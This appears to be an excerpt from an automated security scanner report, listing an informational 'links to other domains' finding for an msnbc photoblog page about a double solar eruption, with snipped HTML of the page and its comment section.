<div class="normal"><a href="http://josh1791701.newsvine.com/">Josh-1791701</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://RevitRay.newsvine.com/">Revit Ray</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mpp2029706.newsvine.com/">mpp-2029706</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://catastrophe3.newsvine.com/">cat(astrophe)</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://markscastle.newsvine.com/">MC-784701</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DaughterofDaedalus.newsvine.com/">Daughter of Daedalus</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.250. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://photoblog.msnbc.redacted
Path:	/_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The page was loaded from a URL containing a query string:

http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun?gt1=43001

The response contains the following links to other domains:

http://2srvhm.newsvine.com/
http://a--smith-1451820.newsvine.com/
http://aanhonestsortnhonestsort-1436725.newsvine.com/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://attameus.newsvine.com/
http://billybill.newsvine.com/
http://brilli99.newsvine.com/
http://cabernet2go.newsvine.com/
http://catastrophe3.newsvine.com/
http://chibnikh.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://countrygirl78.newsvine.com/
http://danwill2.newsvine.com/
http://dateline.msnbc.com/
http://daughterofdaedalus.newsvine.com/
http://daveo2998087.newsvine.com/
http://davidf3.newsvine.com/
http://ds-houston.newsvine.com/
http://dumbjock.newsvine.com/
http://edwardduffy.newsvine.com/
http://elven-bookworm.newsvine.com/
http://eric2189088.newsvine.com/
http://fdpfg.newsvine.com/
http://ffeineandsugar.newsvine.com/
http://fritz2712801.newsvine.com/
http://garrettb1.newsvine.com/
http://ghost2516914.newsvine.com/
http://glenbo02.newsvine.com/
http://hal90004.newsvine.com/
http://halowain.newsvine.com/
http://hardball.msnbc.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://ilovecanoes.newsvine.com/
http://isthishumanity.newsvine.com/
http://iwonder2997692.newsvine.com/
http://jayphly1300264.newsvine.com/
http://jbunn.newsvine.com/
http://john-roach.newsvine.com/
http://josh1791701.newsvine.com/
http://jpfs52.newsvine.com/
http://jwp6868.newsvine.com/
http://larbell.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/photoblog/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=c5942494&rand=1769568873&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F%3Focid%3Dhmlogout&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::
http://mar2892158.newsvine.com/
http://markscastle.newsvine.com/
http://martyofredbay.newsvine.com/
http://mc2075922.newsvine.com/
http://mdb123.newsvine.com/
http://mikeobama2313287.newsvine.com/
http://mikeymike.newsvine.com/
http://mklavano.newsvine.com/
http://mnstrm2.newsvine.com/
http://mossdog420m.newsvine.com/
http://mpp2029706.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nerakluvs.newsvine.com/
http://nightly.msnbc.com/
http://oscarpwalnuts.newsvine.com/
http://pandori.newsvine.com/
http://patrick111.newsvine.com/
http://paulhardy.newsvine.com/
http://phantombeast.newsvine.com/
http://phillyc1.newsvine.com/
http://phloeman.newsvine.com/
http://phoehammer.newsvine.com/
http://platform.twitter.com/widgets.js
http://polanofp.newsvine.com/
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://raysmith.newsvine.com/
http://redtape.msnbc.com/
http://revitray.newsvine.com/
http://revlucifer.newsvine.com/
http://robw1001.newsvine.com/
http://roy-1813861.newsvine.com/
http://rwh0829.newsvine.com/
http://sbphrog.newsvine.com/
http://scott-mckinsey.newsvine.com/
http://sdo.gsfc.nasa.gov/
http://senigallia.newsvine.com/
http://snrekkcaj.newsvine.com/
http://sonflower.newsvine.com/
http://spaceweather.com/
http://spiddas.newsvine.com/
http://steveorevo.newsvine.com/
http://takestwo.newsvine.com/
http://tamuk.newsvine.com/
http://thekhankubla.newsvine.com/
http://today.msnbc.com/
http://tony2997870.newsvine.com/
http://tracer58.newsvine.com/
http://tv.msnbc.com/
http://twitter.com/b0yle
http://twitter.com/share
http://twyla-moon.newsvine.com/
http://unregistereduser.newsvine.com/
http://uradouch.newsvine.com/
http://votelover.newsvine.com/
http://weralldoomed.newsvine.com/
http://whyajones.newsvine.com/
http://wire-bender.newsvine.com/
http://wvbuild.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.byjohnroach.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/cosmiclog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun
http://www.hotmail.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 18:07:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191578

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog - Double whammy
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://photoblog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5942494&rand=1769568873&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F%3Focid%3Dhmlogout&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://photoblog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</span>A spectacular double eruption on the sun was captured today by NASA's <a target="_blank" href="http://sdo.gsfc.nasa.gov/">Solar Dynamics Observatory</a>. The eruptions happened nearly simultaneously on opposite sides of the solar disk, <a target="_blank" href="http://spaceweather.com/">SpaceWeather.com reported</a>
...[SNIP]...
<p><a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_pictures" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" data-Text="Double whammy on the sun">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeyMike.newsvine.com/">MikeyMike</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://DS-Houston.newsvine.com/">DS in Houston</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Ghost2516914.newsvine.com/">Ghost-2516914</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Eric2189088.newsvine.com/">Eric-2189088</a>
...[SNIP]...
<div class="normal"><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://OscarPWalnuts.newsvine.com/">Oscar P Walnuts</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://whyajones.newsvine.com/">Cappy-1911</a>
...[SNIP]...
<div class="normal"><a href="http://jayphly1300264.newsvine.com/">jayphly-1300264</a>
...[SNIP]...
<div class="normal"><a href="http://patrick111.newsvine.com/">Patrick-1112710</a>
...[SNIP]...
<div class="normal"><a href="http://aanhonestsortnhonestsort-1436725.newsvine.com/">anhonestsort-1436725</a>
...[SNIP]...
<div class="normal"><a href="http://PhantomBeast.newsvine.com/">PhantomBeast</a>
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Roy-1813861.newsvine.com/">Roy-1813861</a>
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Nerakluvs.newsvine.com/">Nerakluvs</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://Cabernet2go.newsvine.com/">Ken Johnson-306874</a>
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Sonflower.newsvine.com/">Sonflower</a>
...[SNIP]...
<div class="normal"><a href="http://wvbuild.newsvine.com/">wvbuild</a>
...[SNIP]...
<div class="normal"><a href="http://mdb123.newsvine.com/">MDB123</a>
...[SNIP]...
<div class="normal"><a href="http://Pandori.newsvine.com/">Pandori</a>
...[SNIP]...
<div class="normal"><a href="http://Attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="normal"><a href="http://IWonder2997692.newsvine.com/">I Wonder-2997692</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://spiddas.newsvine.com/">Spiddas</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<a href="#star11" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://tracer58.newsvine.com/">tracer58</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://DumbJock.newsvine.com/">Dumb Jock</a>
...[SNIP]...
<div class="normal"><a href="http://hal90004.newsvine.com/">~HAL9000~</a>
...[SNIP]...
<div class="normal"><a href="http://TAMUK.newsvine.com/">TAMUK</a>
...[SNIP]...
<div class="normal"><a href="http://larbell.newsvine.com/">larbell</a>
...[SNIP]...
<div class="normal"><a href="http://paulhardy.newsvine.com/">orbust</a>
...[SNIP]...
<div class="normal"><a href="http://2srvHM.newsvine.com/">2srvHM</a>
...[SNIP]...
<div class="normal"><a href="http://fdpfg.newsvine.com/">fdpfg</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://mossdog420m.newsvine.com/">Megalodon-358694</a>
...[SNIP]...
<p><a href="http://attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://UnregisteredUser.newsvine.com/">Unregistered User</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://polanofp.newsvine.com/">An American!</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://phillyc1.newsvine.com/">PhillyC</a>
...[SNIP]...
<div class="normal"><a href="http://elven-bookworm.newsvine.com/">Elven Bookworm</a>
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
<a href="#star12" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MC2075922.newsvine.com/">MC-2075922</a>
...[SNIP]...
<a href="#star13" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Phoehammer.newsvine.com/">Phoehammer</a>
...[SNIP]...
<div class="normal"><a href="http://BillyBill.newsvine.com/">BillyBill</a>
...[SNIP]...
<div class="normal"><a href="http://scott-mckinsey.newsvine.com/">Mbones</a>
...[SNIP]...
<div class="normal"><a href="http://edwardduffy.newsvine.com/">Edward Duffy</a>
...[SNIP]...
<div class="normal"><a href="http://DaveO2998087.newsvine.com/">Dave-O-2998087</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="normal"><a href="http://Weralldoomed.newsvine.com/">Weralldoomed</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://robw1001.newsvine.com/">Robert Fleming</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jpfs52.newsvine.com/">jpfs52</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://senigallia.newsvine.com/">senigallia</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
